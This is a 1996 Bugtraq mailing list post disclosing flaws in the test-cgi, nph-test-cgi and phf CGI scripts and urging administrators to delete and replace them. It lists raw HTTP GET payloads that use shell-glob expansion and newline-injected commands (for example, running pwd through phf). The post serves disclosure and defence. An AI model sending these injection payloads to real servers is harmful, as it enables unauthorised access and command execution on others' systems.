[3788] in bugtraq
[nph]test-cgi
daemon@ATHENA.MIT.EDU (*Hobbit*)
Fri Dec 13 14:45:11 1996
Date: Fri, 13 Dec 1996 00:36:00 CST
Reply-To: hobbit@avian.org
From: *Hobbit* <hobbit@avian.org>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>
Interesting how many people are suddenly coming out of the woodwork as
though test-cgi was a new problem.
With minor variants, both scripts are a problem in a couple of areas. Crank
each of these plus a couple of newlines into your server and see what you get:
GET /cgi-bin/test-cgi?* HTTP/1.0
GET /cgi-bin/test-cgi?x *
GET /cgi-bin/nph-test-cgi?* HTTP/1.0
GET /cgi-bin/nph-test-cgi?x *
not to mention
GET /cgi-bin/phf?Q=x%0apwd
GET /cgi-bin/phf?Q=x%ffpwd
then NUKE everything in that cgi-bin dir and replace what you need with
well-written standalone PROGRAMS that start by mistrusting their environment.
_H*
